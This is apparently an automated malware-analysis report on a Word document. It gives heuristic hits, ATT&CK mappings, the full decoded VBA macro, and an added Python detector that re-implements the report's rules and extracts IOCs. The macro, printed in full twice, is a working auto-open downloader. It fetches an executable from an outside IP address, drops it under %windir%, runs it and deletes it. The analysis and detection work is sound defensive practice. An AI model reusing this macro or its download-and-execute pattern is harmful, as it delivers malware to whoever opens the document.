Verdict: MALICIOUS (Risk Score 298)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The sample contains a VBA macro whose autoopen subroutine declares URLDownloadToFile from urlmon.dll and uses it to fetch http://81.27.111.103/ek/liu8080.exe. The downloaded file is written to %windir%\temp.exe (C:\Windows\temp.exe on a default installation), launched with the Shell function, and then deleted with Kill. This is plain downloader behaviour: the document's only job is to fetch and run a second-stage payload. Two caveats matter in practice. The whole routine runs under On Error Resume Next, so a failed download, or a write to %windir% refused because Office is not running elevated, fails silently and leaves no visible trace. Kill is also issued immediately after Shell returns; deleting an executable that is still running usually fails on Windows, so the dropped temp.exe may survive on disk and is worth looking for during forensics.
Heuristics (9)

- ClamAV: Win.Downloader.Agent-34522 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Win.Downloader.Agent-34522
- Reference to URLDownloadToFile API [critical, SC_STR_URLDOWNLOAD]: the URLDownloadToFile API name appears in the file.
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code.
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]. Matched lines in script:
    DownloadFile lURL, szFileLocal & "\temp.exe"
    Shell szFileLocal & "\temp.exe"
    Kill szFileLocal & "\temp.exe"
- URLDownloadToFile in VBA [critical, OLE_VBA_DOWNLOAD]. Matched lines in script:
    Attribute VB_Name = "Module1"
    Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
    Sub autoopen()
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched lines in script:
    Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
    Sub autoopen()
    On Error Resume Next
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]. Matched lines in script:
    Dim lURL As String
    szFileLocal = Environ("windir")
    lURL = "http://81.27.111.103/ek/liu8080.exe"
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's own text says it fires when no modern VBA project was recovered and no stronger macro-virus family marker is present, and it is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the rule text is generic: the VBA project was in fact recovered (see Extracted artifacts), so this finding adds nothing beyond the OLE_VBA_AUTOOPEN hit.
- Embedded URL [info, EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    URL: http://81.27.111.103/ek/liu8080.exe (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1081 bytes | 6ff0903b95edb3bcebac0d543ac9c3b7a93163695dac57acd71c62bd614f1a02 |
Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub autoopen()
On Error Resume Next
Dim szFileLocal
Dim lURL As String
szFileLocal = Environ("windir")
lURL = "http://81.27.111.103/ek/liu8080.exe"
DownloadFile lURL, szFileLocal & "\temp.exe"
Shell szFileLocal & "\temp.exe"
Kill szFileLocal & "\temp.exe"
End Sub
Function DownloadFile(URL As String, LocalFilename As String) As Boolean
Dim lngRetVal As Long
lngRetVal = URLDownloadToFile(0, URL, LocalFilename, 0, 0)
If lngRetVal = 0 Then DownloadFile = True
End Function
```
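The heuristics above are simple line-level rules over the decoded macro source, and the Malware Insights summary is what you get when you chain those hits together (auto-execution plus download plus execution, then pull the URL and drop path out as IOCs). The following is an added example of that workflow, not the analyzer's code and not part of oletools: it re-implements the report's VBA rules as regexes over the Module1 source recovered from this sample, resolves the `Environ("windir") & "\temp.exe"` concatenation into a drop path, classifies the result, and maps the hits to the ATT&CK techniques the report lists. The rule identifiers mirror the report's labels, the regexes are my own approximation of what those rules match, and OLE_VBA_SELFDELETE (the Kill on the dropped file) is an extra rule of mine, not one the report has.

```python
"""Added example: static scan of the recovered VBA downloader with rules that
mirror this report's heuristics. Not the analyzer's or oletools' own code."""
import re
from dataclasses import dataclass, field

# Input: the Module1 part of macros.bas exactly as recovered in the report above.
MACRO_SOURCE = r'''Attribute VB_Name = "Module1"
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub autoopen()
On Error Resume Next
Dim szFileLocal
Dim lURL As String
szFileLocal = Environ("windir")
lURL = "http://81.27.111.103/ek/liu8080.exe"
DownloadFile lURL, szFileLocal & "\temp.exe"
Shell szFileLocal & "\temp.exe"
Kill szFileLocal & "\temp.exe"
End Sub
Function DownloadFile(URL As String, LocalFilename As String) As Boolean
Dim lngRetVal As Long
lngRetVal = URLDownloadToFile(0, URL, LocalFilename, 0, 0)
If lngRetVal = 0 Then DownloadFile = True
End Function
'''


@dataclass
class Finding:
    rule: str
    severity: str
    description: str
    matched_lines: list = field(default_factory=list)


# (rule id, severity, description, pattern applied to each line). Rule ids
# follow the report; the regexes are assumptions about what those rules look for.
RULES = [
    ("OLE_VBA_AUTOOPEN", "low", "AutoOpen macro",
     re.compile(r"\bSub\s+(?:auto_?open|auto_?exec|document_open|workbook_open)\b", re.I)),
    ("OLE_VBA_DOWNLOAD", "critical", "URLDownloadToFile in VBA",
     re.compile(r"\bURLDownloadToFile", re.I)),
    ("OLE_VBA_SHELL", "critical", "Potential Shell call in VBA",
     re.compile(r"^\s*(?:Call\s+)?Shell\b|\bShell\s*\(", re.I)),
    ("OLE_VBA_ENVIRON", "low", "Environ() call (env variable access)",
     re.compile(r"\bEnviron\s*\(", re.I)),
    # Extra rule (mine, not in the report): Kill on the file it just dropped.
    ("OLE_VBA_SELFDELETE", "medium", "Kill on dropped file (self-cleanup)",
     re.compile(r"^\s*Kill\b", re.I)),
]
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
ENV_ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*Environ\("(\w+)"\)', re.I | re.M)

# Rule -> technique, taken from the report's MITRE ATT&CK section.
ATTACK = {
    "OLE_VBA_AUTOOPEN": "T1059.005 Visual Basic",
    "OLE_VBA_SHELL": "T1059.005 Visual Basic",
    "OLE_VBA_DOWNLOAD": "T1105 Ingress Tool Transfer",
}


def scan(source: str) -> list:
    """Apply every rule line by line; a rule fires once, carrying all matching lines."""
    findings = []
    lines = source.splitlines()
    for rule_id, severity, description, rx in RULES:
        hits = [ln.strip() for ln in lines if rx.search(ln)]
        if hits:
            findings.append(Finding(rule_id, severity, description, hits))
    return findings


def extract_iocs(source: str) -> dict:
    """URLs, plus drop paths rebuilt from 'var = Environ("X")' and 'var & "suffix"'."""
    urls = sorted(set(URL_RE.findall(source)))
    paths = set()
    for var, env in ENV_ASSIGN_RE.findall(source):
        for suffix in re.findall(rf'\b{re.escape(var)}\s*&\s*"([^"]+)"', source):
            paths.add(f"%{env}%{suffix}")          # e.g. %windir%\temp.exe
    return {"urls": urls, "drop_paths": sorted(paths)}


def classify(findings: list) -> str:
    """Download + execute in one macro is a downloader; auto-exec makes it fire on open."""
    ids = {f.rule for f in findings}
    if {"OLE_VBA_DOWNLOAD", "OLE_VBA_SHELL"} <= ids:
        return "downloader" + (" (auto-executing)" if "OLE_VBA_AUTOOPEN" in ids else "")
    return "macro present" if ids else "no macro indicators"


def attack_techniques(findings: list) -> list:
    techs = {ATTACK[f.rule] for f in findings if f.rule in ATTACK}
    if findings:
        techs.add("T1204.002 Malicious File")  # the document itself, opened by the user
    return sorted(techs)


if __name__ == "__main__":
    hits = scan(MACRO_SOURCE)
    for f in hits:
        print(f"[{f.severity:8}] {f.rule}: {f.description}")
        for ln in f.matched_lines:
            print("             ", ln)
    print("IOCs:   ", extract_iocs(MACRO_SOURCE))
    print("Verdict:", classify(hits))
    print("ATT&CK: ", attack_techniques(hits))
```

Run it as a script and it prints the five rule hits with their matched lines, the URL and the resolved drop path `%windir%\temp.exe`, the verdict "downloader (auto-executing)" and the three techniques. The drop-path resolver only follows one level of `Environ(...) & "literal"` concatenation, which is enough for this sample; obfuscated macros that build strings with Chr(), Replace() or Mid() need the emulation that olevba's deobfuscation mode and dynamic sandboxes provide, which is exactly why a static hit on URLDownloadToFile is rated critical on its own.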